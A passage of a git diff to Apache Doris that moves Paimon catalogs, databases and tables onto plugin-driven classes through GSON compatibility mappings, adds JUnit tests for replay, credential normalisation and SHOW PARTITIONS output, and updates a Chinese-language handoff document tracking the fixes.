PaimonRestExternalCatalog.class.getSimpleName()) .registerSubtype(LakeSoulExternalCatalog.class, LakeSoulExternalCatalog.class.getSimpleName()) .registerSubtype(TestExternalCatalog.class, TestExternalCatalog.class.getSimpleName()) - .registerSubtype(PaimonDLFExternalCatalog.class, PaimonDLFExternalCatalog.class.getSimpleName()) .registerSubtype(RemoteDorisExternalCatalog.class, RemoteDorisExternalCatalog.class.getSimpleName()) .registerSubtype(PluginDrivenExternalCatalog.class, PluginDrivenExternalCatalog.class.getSimpleName()) @@ -409,7 +397,18 @@ public class GsonUtils { PluginDrivenExternalCatalog.class, "TrinoConnectorExternalCatalog") // Migrate old MaxCompute catalogs to PluginDriven on deserialization .registerCompatibleSubtype( - PluginDrivenExternalCatalog.class, "MaxComputeExternalCatalog"); + PluginDrivenExternalCatalog.class, "MaxComputeExternalCatalog") + // Migrate old Paimon catalogs (all 5 flavors) to PluginDriven on deserialization + .registerCompatibleSubtype( + PluginDrivenExternalCatalog.class, "PaimonExternalCatalog") + .registerCompatibleSubtype( + PluginDrivenExternalCatalog.class, "PaimonHMSExternalCatalog") + .registerCompatibleSubtype( + PluginDrivenExternalCatalog.class, "PaimonFileExternalCatalog") + .registerCompatibleSubtype( + PluginDrivenExternalCatalog.class, "PaimonRestExternalCatalog") + .registerCompatibleSubtype( + PluginDrivenExternalCatalog.class, "PaimonDLFExternalCatalog"); if (Config.isNotCloudMode()) { dsTypeAdapterFactory .registerSubtype(InternalCatalog.class, InternalCatalog.class.getSimpleName()); @@ -448,7 +447,6 @@ public class GsonUtils { .registerSubtype(HMSExternalDatabase.class, HMSExternalDatabase.class.getSimpleName()) .registerSubtype(IcebergExternalDatabase.class, IcebergExternalDatabase.class.getSimpleName()) .registerSubtype(LakeSoulExternalDatabase.class, LakeSoulExternalDatabase.class.getSimpleName()) - .registerSubtype(PaimonExternalDatabase.class, PaimonExternalDatabase.class.getSimpleName()) .registerSubtype(ExternalInfoSchemaDatabase.class, ExternalInfoSchemaDatabase.class.getSimpleName()) .registerSubtype(ExternalMysqlDatabase.class, ExternalMysqlDatabase.class.getSimpleName()) .registerSubtype(TestExternalDatabase.class, TestExternalDatabase.class.getSimpleName()) @@ -461,7 +459,9 @@ public class GsonUtils { .registerCompatibleSubtype( PluginDrivenExternalDatabase.class, "TrinoConnectorExternalDatabase") .registerCompatibleSubtype( - PluginDrivenExternalDatabase.class, "MaxComputeExternalDatabase"); + PluginDrivenExternalDatabase.class, "MaxComputeExternalDatabase") + .registerCompatibleSubtype( + PluginDrivenExternalDatabase.class, "PaimonExternalDatabase"); private static RuntimeTypeAdapterFactory tblTypeAdapterFactory = RuntimeTypeAdapterFactory.of( TableIf.class, "clazz").registerSubtype(ExternalTable.class, ExternalTable.class.getSimpleName()) @@ -469,7 +469,6 @@ public class GsonUtils { .registerSubtype(HMSExternalTable.class, HMSExternalTable.class.getSimpleName()) .registerSubtype(IcebergExternalTable.class, IcebergExternalTable.class.getSimpleName()) .registerSubtype(LakeSoulExternalTable.class, LakeSoulExternalTable.class.getSimpleName()) - .registerSubtype(PaimonExternalTable.class, PaimonExternalTable.class.getSimpleName()) .registerSubtype(ExternalInfoSchemaTable.class, ExternalInfoSchemaTable.class.getSimpleName()) .registerSubtype(ExternalMysqlTable.class, ExternalMysqlTable.class.getSimpleName()) .registerSubtype(TestExternalTable.class, TestExternalTable.class.getSimpleName()) @@ -485,6 +484,9 @@ public class GsonUtils { PluginDrivenExternalTable.class, "TrinoConnectorExternalTable") .registerCompatibleSubtype( PluginDrivenExternalTable.class, "MaxComputeExternalTable") + // Paimon tables migrate to the MVCC variant (paimon supports MVCC/MTMV/time-travel) + .registerCompatibleSubtype( + PluginDrivenMvccExternalTable.class, "PaimonExternalTable") .registerSubtype(BrokerTable.class, BrokerTable.class.getSimpleName()) .registerSubtype(EsTable.class, EsTable.class.getSimpleName()) .registerSubtype(FunctionGenTable.class, FunctionGenTable.class.getSimpleName()) diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextVendTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextVendTest.java new file mode 100644 index 00000000000000..b8314046dd5512 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextVendTest.java @@ -0,0 +1,70 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; + +/** + * FIX-REST-VENDED fe-core bridge test: pins that + * {@link DefaultConnectorContext#vendStorageCredentials} reuses the engine's + * {@code StorageProperties} normalization (the same chain legacy + * {@code AbstractVendedCredentialsProvider} runs) to turn a raw per-table OSS vended token into the + * BE-facing {@code AWS_*} storage properties. The connector cannot import that machinery, so this + * hook is the single source of truth — without it a REST native-reader table reaches BE with no + * usable credentials (403). FAILS before the fix (the method is a no-op default returning empty). + */ +public class DefaultConnectorContextVendTest { + + private static DefaultConnectorContext context() { + return new DefaultConnectorContext("c", 1L); + } + + @Test + public void normalizesOssTokenToBackendAwsProps() { + // Mirrors the raw OSS vended token shape from PaimonVendedCredentialsProviderTest. + Map token = new HashMap<>(); + token.put("fs.oss.accessKeyId", "STS.testAccessKey123"); + token.put("fs.oss.accessKeySecret", "testSecretKey456"); + token.put("fs.oss.securityToken", "testSessionToken789"); + token.put("fs.oss.endpoint", "oss-cn-beijing.aliyuncs.com"); + + Map be = context().vendStorageCredentials(token); + + // WHY: the BE native S3/object-store client consumes ONLY normalized AWS_* keys; the raw + // fs.oss.* token is unintelligible to it. The bridge must run StorageProperties.createAll + + // getBackendPropertiesFromStorageMap to produce them. MUTATION: leaving the default no-op + // (empty) or skipping the normalization -> AWS_ACCESS_KEY absent -> red. + Assertions.assertFalse(be.isEmpty(), "a valid OSS token must normalize to non-empty BE props"); + Assertions.assertEquals("STS.testAccessKey123", be.get("AWS_ACCESS_KEY")); + Assertions.assertEquals("testSecretKey456", be.get("AWS_SECRET_KEY")); + Assertions.assertEquals("testSessionToken789", be.get("AWS_TOKEN")); + } + + @Test + public void emptyOrNullInputYieldsEmpty() { + // WHY: a non-REST / no-token table passes an empty map; the bridge must short-circuit to + // empty (no overlay), never NPE. MUTATION: NPE on null, or fabricating props from nothing -> red. + Assertions.assertTrue(context().vendStorageCredentials(Collections.emptyMap()).isEmpty()); + Assertions.assertTrue(context().vendStorageCredentials(null).isEmpty()); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PaimonGsonCompatReplayTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PaimonGsonCompatReplayTest.java new file mode 100644 index 00000000000000..11762605ff1871 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PaimonGsonCompatReplayTest.java @@ -0,0 +1,120 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.DatabaseIf; +import org.apache.doris.catalog.TableIf; +import org.apache.doris.persist.gson.GsonUtils; + +import com.google.common.collect.Maps; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Map; + +/** + * Guards the P5 paimon SPI cutover edit-log compatibility: an FE image / edit log written by a + * pre-cutover version persisted paimon catalogs/databases/tables under their legacy class simple + * names (the GSON "clazz" discriminator). After the cutover those legacy classes are no longer + * {@code registerSubtype}'d, so on replay the {@code registerCompatibleSubtype} mappings in + * {@link GsonUtils} MUST redirect every legacy tag to the generic PluginDriven class — otherwise + * the FE crashes on startup with a {@code JsonParseException} (tag not registered) or a downstream + * {@code ClassCastException}. + * + *

      Why this matters / what would break it: the three GSON registries (catalog, db, table) + * must migrate atomically. If any one of the 7 legacy tags is left unmapped, replaying an image + * from a cluster that had a paimon catalog would fail. The table tag is special (D-042): paimon + * supports MVCC/MTMV/time-travel, so {@code PaimonExternalTable} must replay as the MVCC variant, + * not the base {@code PluginDrivenExternalTable} — replaying as the base would silently downgrade a + * persisted paimon table and lose the MVCC behavior on every FE restart.

      + * + *

      Each case round-trips a valid PluginDriven object through GSON, rewrites only the "clazz" + * discriminator to the legacy tag (faithfully reproducing old-image bytes without depending on the + * soon-to-be-deleted Paimon* classes), then deserializes and asserts the resolved runtime class.

      + */ +public class PaimonGsonCompatReplayTest { + + private static String swapClazz(String json, String currentTag, String legacyTag) { + String needle = "\"clazz\":\"" + currentTag + "\""; + // Sanity: the polymorphic serialization must emit the discriminator we are about to rewrite. + Assertions.assertTrue(json.contains(needle), + "expected discriminator " + needle + " in serialized json: " + json); + return json.replace(needle, "\"clazz\":\"" + legacyTag + "\""); + } + + @Test + public void testLegacyPaimonCatalogTagsReplayAsPluginDriven() { + Map props = Maps.newHashMap(); + props.put("type", "paimon"); + // 6-arg ctor sets logType=PLUGIN and a non-null catalogProperty, so gsonPostProcess replays + // cleanly (the legacy-logType backfill branch is skipped and setDefaultPropsIfMissing has a + // catalogProperty to write into). + PluginDrivenExternalCatalog catalog = + new PluginDrivenExternalCatalog(1L, "pmn_ctl", "", props, "c", null); + String baseJson = GsonUtils.GSON.toJson(catalog, CatalogIf.class); + + // All 5 paimon catalog flavors persisted by a pre-cutover FE. + String[] legacyTags = { + "PaimonExternalCatalog", + "PaimonHMSExternalCatalog", + "PaimonFileExternalCatalog", + "PaimonRestExternalCatalog", + "PaimonDLFExternalCatalog", + }; + for (String tag : legacyTags) { + String json = swapClazz(baseJson, "PluginDrivenExternalCatalog", tag); + // MUTATION: removing the registerCompatibleSubtype for this flavor throws + // "cannot deserialize ... subtype named " here; a wrong target class fails instanceof. + CatalogIf restored = GsonUtils.GSON.fromJson(json, CatalogIf.class); + Assertions.assertTrue(restored instanceof PluginDrivenExternalCatalog, + "legacy edit-log tag '" + tag + + "' must replay as PluginDrivenExternalCatalog (no crash/ClassCastException)"); + } + } + + @Test + public void testLegacyPaimonDatabaseTagReplaysAsPluginDriven() { + PluginDrivenExternalDatabase db = new PluginDrivenExternalDatabase(); + db.id = 2L; + db.name = "pmn_db"; + String baseJson = GsonUtils.GSON.toJson(db, DatabaseIf.class); + + String json = swapClazz(baseJson, "PluginDrivenExternalDatabase", "PaimonExternalDatabase"); + // MUTATION: dropping the db registerCompatibleSubtype makes this throw on deserialize. + DatabaseIf restored = GsonUtils.GSON.fromJson(json, DatabaseIf.class); + Assertions.assertTrue(restored instanceof PluginDrivenExternalDatabase, + "legacy 'PaimonExternalDatabase' tag must replay as PluginDrivenExternalDatabase"); + } + + @Test + public void testLegacyPaimonTableTagReplaysAsMvccPluginDriven() { + PluginDrivenMvccExternalTable table = new PluginDrivenMvccExternalTable(); + table.id = 3L; + table.name = "pmn_tbl"; + table.dbName = "pmn_db"; + String baseJson = GsonUtils.GSON.toJson(table, TableIf.class); + + String json = swapClazz(baseJson, "PluginDrivenMvccExternalTable", "PaimonExternalTable"); + TableIf restored = GsonUtils.GSON.fromJson(json, TableIf.class); + // D-042: paimon tables must replay as the MVCC variant. instanceof would also pass for a + // subclass, so assert the EXACT class to catch a mistaken mapping to the base table. + Assertions.assertSame(PluginDrivenMvccExternalTable.class, restored.getClass(), + "legacy 'PaimonExternalTable' tag must replay as PluginDrivenMvccExternalTable (D-042)," + + " not the base PluginDrivenExternalTable"); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTablePartitionTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTablePartitionTest.java index 2baded937e621c..5ac322f7ef5c46 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTablePartitionTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalTablePartitionTest.java @@ -225,6 +225,50 @@ public void testInitSchemaNoPartitionsWhenPropAbsent() { Assertions.assertTrue(((PluginDrivenSchemaCacheValue) result.get()).getPartitionColumns().isEmpty()); } + // ==================== getTableProperties (SHOW CREATE TABLE source, D-046) ==================== + + @Test + public void testGetTablePropertiesStripsSchemaControlKeysButKeepsUserOptions() { + // The connector stuffs BOTH user-facing table options (path / file.format) AND the + // FE-internal schema-control keys (partition_columns / primary_keys) into one properties map. + Map rawProps = new LinkedHashMap<>(); + rawProps.put("path", "s3://wh/db/t"); + rawProps.put("file.format", "orc"); + rawProps.put("partition_columns", "dt"); + rawProps.put("primary_keys", "id"); + PluginDrivenSchemaCacheValue cacheValue = new PluginDrivenSchemaCacheValue( + Collections.singletonList(new Column("id", PrimitiveType.INT)), + Collections.emptyList(), Collections.emptyList(), rawProps); + PluginDrivenExternalTable table = tableWithCacheValue(cacheValue); + + Map props = table.getTableProperties(); + // WHY (D-046): SHOW CREATE TABLE's LOCATION reads "path" and PROPERTIES(...) dumps this map. + // The user-facing options MUST survive, but the FE-internal control keys MUST be stripped — + // they are emitted only so initSchema() can derive partition columns and would corrupt the + // round-tripped DDL. MUTATION: dropping the filter -> partition_columns/primary_keys leak -> + // red; over-filtering (removing "path") -> LOCATION renders empty -> red. + Assertions.assertEquals("s3://wh/db/t", props.get("path")); + Assertions.assertEquals("orc", props.get("file.format")); + Assertions.assertFalse(props.containsKey("partition_columns"), + "partition_columns is an FE-internal control key, must not appear in SHOW CREATE PROPERTIES"); + Assertions.assertFalse(props.containsKey("primary_keys"), + "primary_keys is an FE-internal control key, must not appear in SHOW CREATE PROPERTIES"); + } + + @Test + public void testGetTablePropertiesEmptyWhenConnectorEmitsNone() { + // MaxCompute-style connector emits no table properties: the 3-arg cache-value ctor must + // default to an empty map so SHOW CREATE TABLE stays comment-only (no empty LOCATION ''/ + // PROPERTIES () lines). MUTATION: defaulting to null -> NPE in getTableProperties / Env -> red. + PluginDrivenSchemaCacheValue cacheValue = new PluginDrivenSchemaCacheValue( + Collections.singletonList(new Column("c", PrimitiveType.INT)), + Collections.emptyList(), Collections.emptyList()); + PluginDrivenExternalTable table = tableWithCacheValue(cacheValue); + + Assertions.assertTrue(table.getTableProperties().isEmpty(), + "a connector emitting no properties (e.g. MaxCompute) must yield empty table properties"); + } + // ==================== helpers ==================== private static ConnectorPartitionInfo partition(String name, String year, String month) { diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java index 015fe28d67f828..f02b8c4fb353ca 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java @@ -621,7 +621,8 @@ public void testIsPartitionColumnAllowNullTrue() { private static ConnectorPartitionInfo cpi(String name, long lastModifiedMillis) { return new ConnectorPartitionInfo(name, Collections.emptyMap(), Collections.emptyMap(), - ConnectorPartitionInfo.UNKNOWN, ConnectorPartitionInfo.UNKNOWN, lastModifiedMillis); + ConnectorPartitionInfo.UNKNOWN, ConnectorPartitionInfo.UNKNOWN, lastModifiedMillis, + ConnectorPartitionInfo.UNKNOWN); } /** diff --git a/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommandPluginDrivenTest.java b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommandPluginDrivenTest.java index a3e830080c6aec..c727c4e5c46c32 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommandPluginDrivenTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommandPluginDrivenTest.java @@ -17,14 +17,19 @@ package org.apache.doris.nereids.trees.plans.commands; +import org.apache.doris.catalog.Column; +import org.apache.doris.catalog.PrimitiveType; import org.apache.doris.catalog.info.TableNameInfo; import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorCapability; import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorPartitionInfo; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.datasource.ExternalDatabase; import org.apache.doris.datasource.ExternalTable; import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalTable; import org.apache.doris.qe.ShowResultSet; import org.junit.jupiter.api.Assertions; @@ -34,6 +39,8 @@ import java.lang.reflect.Field; import java.lang.reflect.Method; import java.util.Arrays; +import java.util.Collections; +import java.util.EnumSet; import java.util.List; import java.util.Optional; @@ -95,6 +102,75 @@ public void testHandlerRoutesToSpiWithRemoteNames() throws Exception { Mockito.verify(metadata).getTableHandle(session, "remote_db", "remote_tbl"); } + @Test + public void testHandlerEmitsFiveColumnsWhenConnectorDeclaresPartitionStats() throws Exception { + TableNameInfo tableName = Mockito.mock(TableNameInfo.class); + Mockito.when(tableName.getDb()).thenReturn("db"); + Mockito.when(tableName.getTbl()).thenReturn("t"); + + ShowPartitionsCommand command = new ShowPartitionsCommand(tableName, null, null, -1L, -1L, false); + + ConnectorSession session = Mockito.mock(ConnectorSession.class); + Connector connector = Mockito.mock(Connector.class); + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + ExternalDatabase db = Mockito.mock(ExternalDatabase.class); + // Must be a PluginDrivenExternalTable: the 5-col path casts the table to read its partition + // columns for the PartitionKey column. + PluginDrivenExternalTable table = Mockito.mock(PluginDrivenExternalTable.class); + Mockito.when(table.getRemoteDbName()).thenReturn("remote_db"); + Mockito.when(table.getRemoteName()).thenReturn("remote_tbl"); + Mockito.when(table.getPartitionColumns()).thenReturn(Arrays.asList( + new Column("dt", PrimitiveType.INT), new Column("region", PrimitiveType.INT))); + + Mockito.doReturn(db).when(catalog).getDbOrAnalysisException("db"); + Mockito.doReturn(table).when(db).getTableOrAnalysisException("t"); + Mockito.when(catalog.buildConnectorSession()).thenReturn(session); + Mockito.when(catalog.getConnector()).thenReturn(connector); + Mockito.when(connector.getMetadata(session)).thenReturn(metadata); + // The capability that flips SHOW PARTITIONS to the 5-column rich result (D-045). + Mockito.when(connector.getCapabilities()) + .thenReturn(EnumSet.of(ConnectorCapability.SUPPORTS_PARTITION_STATS)); + Mockito.when(metadata.getTableHandle(session, "remote_db", "remote_tbl")) + .thenReturn(Optional.of(handle)); + Mockito.when(metadata.listPartitions(Mockito.eq(session), Mockito.eq(handle), Mockito.any())) + .thenReturn(Collections.singletonList(new ConnectorPartitionInfo( + "dt=2024/region=cn", Collections.emptyMap(), Collections.emptyMap(), + /*rowCount*/ 42L, /*sizeBytes*/ 1024L, /*lastModifiedMillis*/ 1700000000000L, + /*fileCount*/ 7L))); + + setField(command, "catalog", catalog); + + Method m = ShowPartitionsCommand.class.getDeclaredMethod("handleShowPluginDrivenTablePartitions"); + m.setAccessible(true); + ShowResultSet rs = (ShowResultSet) m.invoke(command); + + List> rows = rs.getResultRows(); + Assertions.assertEquals(1, rows.size()); + List row = rows.get(0); + // WHY (D-045): a connector declaring SUPPORTS_PARTITION_STATS yields the legacy paimon + // 5-column result: Partition / PartitionKey / RecordCount / FileSizeInBytes / FileCount. + // MUTATION: gating on instanceof PaimonExternalCatalog (false here) or dropping the capability + // branch -> 1-col fallback -> red. + Assertions.assertEquals(5, row.size(), + "SUPPORTS_PARTITION_STATS must yield the 5-column rich result, not the 1-col fallback"); + Assertions.assertEquals("dt=2024/region=cn", row.get(0)); + // PartitionKey = table partition-column names comma-joined, identical on every row. + // MUTATION: deriving it from per-partition getPartitionValues() instead of the table's + // partition columns -> red. + Assertions.assertEquals("dt,region", row.get(1)); + // RecordCount<-getRowCount, FileSizeInBytes<-getSizeBytes, FileCount<-getFileCount. + // MUTATION: swapping these getters / dropping fileCount -> red. + Assertions.assertEquals("42", row.get(2)); + Assertions.assertEquals("1024", row.get(3)); + Assertions.assertEquals("7", row.get(4)); + // getMetaData() MUST agree on the column count or ShowResultSet headers/rows diverge. + Assertions.assertEquals(5, command.getMetaData().getColumnCount(), + "getMetaData must produce 5 headers to match the 5-col rows (same capability gate)"); + } + private static void setField(Object target, String name, Object value) throws Exception { Field f = ShowPartitionsCommand.class.getDeclaredField(name); f.setAccessible(true); diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 36ac5a41943d86..36a0c1ed2e267f 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,48 +5,60 @@ --- -# 🔥 2026-06-10 — P5 paimon B4 完成(sys-tables E7 + MVCC E5,T16-T20);下一步 = B5(MTMV 桥) +# ✅ 已完成(本 session,2026-06-11)— P5 paimon fullpath-review 修复执行(全 8 fix IMPL) -> **本 session**:按 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) 落地 **B4**。subagent-driven(understand workflow 6-agent → 主线 firsthand 核读 → 用户签 D-039 + T20 留 B4 → 5 dispatch 各 implement→双审/fix-loop → 3-lens final holistic review + 主线 firsthand 复跑)。**B0–B3 已 commit(`a2b765677d1`);B4 改动未提交**(用户控时机,工作树仅含 B4)。 +**用户选定 scope = "BLOCKERs + key MAJORs" = 8 fix。本 session 完成全部 8 个 fix 的 IMPL + UT + 文档。** +进度表:[`plan-doc/task-list-P5-paimon-fixes.md`](./task-list-P5-paimon-fixes.md)(8/8 全勾)。每 fix 的 IMPL SUMMARY 写回 `plan-doc/tasks/designs/P5-fix--design.md` 尾部。 -## ✅ 本 session 已完成(B4 = T16-T20) +## 8 fix 全绿(build+连接器 UT,maven 绝对 -f,读 surefire XML) +| # | id | sev | 改动 | UT | +|---|----|-----|------|-----| +| 1 | FIX-STORAGE-CREDS | BLOCKER×2 | `applyStorageConfig` 加 canonical s3.*/oss.*/AWS_* → fs.s3a./fs.oss.(+DLF region 派生 OSS endpoint) | PaimonCatalogFactoryTest 38/0 | +| 2 | FIX-NATIVE-PARTVAL | BLOCKER+MAJOR | `serializePartitionValue` 全类型 port + session-TZ(仅 LTZ 用) | PaimonPartitionValueRenderTest 7/0 | +| 3 | FIX-TZ-ALIAS | MAJOR | 完整 legacy 别名图(`ZoneId.SHORT_IDS`+4 override,TreeMap CI) | PaimonConnectorMetadataMvccTest 37/0 | +| 4 | FIX-TABLE-STATS | MAJOR | `getTableStatistics` override + `PaimonCatalogOps.rowCount` seam | PaimonConnectorMetadataStatisticsTest 4/0 | +| 5 | FIX-CPP-READER | BLOCKER | `enable_paimon_cpp_reader` → `encodeSplit` 原生 DataSplit.serialize | PaimonScanPlanProviderTest(含真 DataSplit 往返) | +| 6 | FIX-READ-NOTNULL | MAJOR | `mapFields` 一行 `nullable=true`(legacy parity restore) | PaimonConnectorMetadataTest 12/0 | +| 7 | FIX-HMS-CONFRES | MAJOR | **扩 SPI** `loadHiveConfResources` + `buildHmsHiveConf(props,fileMap)` base 合并 | conn 42/0 + PaimonHmsConfResWiringTest | +| 8 | FIX-REST-VENDED | BLOCKER | **扩 SPI** `vendStorageCredentials` + scan-props `location.*` overlay | conn 15/0 + fe-core DefaultConnectorContextVendTest 2/0 | -- **T16**(greenfield E7 SPI):`ConnectorTableOps` 加 `listSupportedSysTables(session, baseHandle)`→`List` + `getSysTableHandle(session, baseHandle, sysName)`→`Optional`,**default no-op**(MC/jdbc/es/trino 不受影响)。唯一 `fe-connector-api` 改动。 -- **T17**(paimon 实现 E7):`PaimonConnectorMetadata.listSupportedSysTables`=`SystemTableLoader.SYSTEM_TABLES`;`getSysTableHandle` 经**现有** `getTable(Identifier)` seam 喂 4-arg `new Identifier(db,table,"main",sysName)`(branch 硬编 "main")。`PaimonTableHandle` 加 serializable `sysTableName`+`forceJni`(="binlog"||"audit_log"),`forSystemTable` factory,lowercase 规范化,equals/hashCode 含 sysTableName。**fix-loop**:抽共享 `PaimonTableResolver.resolve(catalogOps, handle)`(metadata+scan **一处** sys-aware reload;修 scan-twin 丢 sys-Table)+ Java 序列化 round-trip 测 + null-guard。 -- **T18**(fe-core 通用):`PluginDrivenExternalTable` 把 4 处 handle 获取集中入 `protected resolveConnectorTableHandle(session, metadata)` seam + `getSupportedSysTables()` override 委托连接器 `listSupportedSysTables`;新 `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(**报 PLUGIN_EXTERNAL_TABLE**,override `resolveConnectorTableHandle` 喂 sys handle,transient 不持久化/**不 GSON 注册**)+ 新 `PluginDrivenSysTable extends NativeSysTable`(`createSysExternalTable`)。复用 live `SysTableResolver`/`TableIf.getSupportedSysTables/findSysTable` 机制(D-039)。 -- **T19**(forceJni + 描述符 + fail-loud):`PaimonScanPlanProvider` DataSplit 分支 gate `shouldUseNativeReader(forceJni,…)`=`!forceJni && supportNativeReader`(ro 仍 native、metadata 表经 non-DataSplit JNI);`PaimonConnectorMetadata.buildTableDescriptor`→`HIVE_TABLE`+`THiveTable`(**同修 B2 遗留** SCHEMA_TABLE fallback [DV-024],普通+sys 表共修);`PluginDrivenScanNode` 加 `checkSysTableScanConstraints()`(sys 表 + scan-params/snapshot → fail-loud,跑于 getSplits+startSplit 两入口)。 -- **T20**(首个 E5 消费者,**inert until B5**):`beginQuerySnapshot/getSnapshotAt/getSnapshotById`(snapshot seam `latestSnapshotId`/`snapshotIdAtOrBefore`/`snapshotExists`:SDK 实现在 `CatalogBackedPaimonCatalogOps`、fake 在 `RecordingPaimonCatalogOps`;sys handle→`Optional.empty`;空表→-1;SPI **empty-if-none** vs legacy throw 已 doc——B5 消费方 surface 用户错误)+ `PaimonConnector.getCapabilities`=`SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`。 -- **验证(主线 firsthand 复跑)**:import-gate 0;连接器 `Tests run: 124, Failures: 0, Errors: 0, Skipped: 1`(live);fe-core `PluginDriven*Test` `Tests run: 100, Failures: 0, Errors: 0`;checkstyle 0;**无 cutover 泄漏**(paimon 未入 `SPI_READY_TYPES`、GsonUtils/CatalogFactory/PhysicalPlanTranslator 零改)+ **无 B5 泄漏**(`PluginDrivenExternalTable` 仍非 MvccTable)。每 dispatch 双审/mutation-verified;3-lens final holistic = PARITY/SCOPE READY + 1 ADVERSARIAL BLOCKER 已修。 +- **最终整模块 checkpoint**:`fe-connector-paimon` 19 测试类 / **213 tests / 0 fail / 0 err / 1 skip**(skip=live-gated `PaimonLiveConnectivityTest`)。 +- **fe-core 编译干净** + fe-core 新测 `DefaultConnectorContextVendTest` 2/0(验真 `StorageProperties` 归一化产出 AWS_*)。 +- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh` 全程 clean。 -## 🧠 核心发现 / 纠偏(understand 纠偏 2 处 + final review 1 BLOCKER) +## ⚠️ 实现中查出的设计订正(已落各 design 尾 + 已修,复审锚点) +- **FIX-STORAGE-CREDS**:设计的 anon-bucket 测断言 `assertNull(fs.s3a.aws.credentials.provider)` 错——Hadoop `Configuration` 有 baked-in 默认 provider 链;改 `assertNotEquals(Simple-single,…)`(产线正确,仅测断言订正)。 +- **FIX-NATIVE-PARTVAL**:`ISO_LOCAL_DATE_TIME` 在秒+纳秒皆 0 时**省略秒**(`08:00:00`→`"…T08:00"`,legacy 同行为);测用非零秒 wall clock(`01:02:03`)避歧义。 +- **FIX-TZ-ALIAS**:把 `resolveTimestampDigitalUnaffectedByUnsupportedZoneAlias` 的 `"CST"`→`"XYZ"`(CST 修后会解析,留 CST 则测失去捕变力)——设计说"keep as-is",此为 Rule 9 必要订正。 +- **FIX-HMS-CONFRES**:设计 test2 用 `hive.metastore.uris`,被 `HMS_URI` 别名二次解析干扰;改用非 uri 键 `hive.metastore.sasl.qop` 隔离 file-base-vs-user 优先级(产线正确)。 +- **FIX-REST-VENDED**:设计"Construction change"(线程 `Supplier` 入 ctor + 改 `PluginDrivenExternalCatalog`/`CatalogFactory`)**实际不需要**——impl 仅用 `rawVendedCredentials` 入参,故 0 ctor 改、0 `PluginDrivenExternalCatalog` 改(blast-radius 更小)。 -1. **D-039(签字)— E7 形状 = 复用 live SysTable 机制(非 RFC §10)**:RFC §10 的「`$`-后缀普通表 + 连接器 `getTableHandle` 内解析 + `listSysTableSuffixes`」**从未落地**;live fe-core 用 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(iceberg+legacy-paimon 共用)。用户签复用该机制。RFC §10 已加 superseded 脚注([DV-023])。 -2. **T20 MVCC inert until B5(签字留 B4)**:E5 SPI 方法早存在 default-no-op,但 `PluginDrivenExternalTable` 非 `MvccTable`、`ConnectorMvccSnapshotAdapter` 零构造方、capability 零 reader → T20 实现纯连接器侧 groundwork,无可观察行为,须 B5 接活。翻闸(B7) gated on B5,故 inert capability 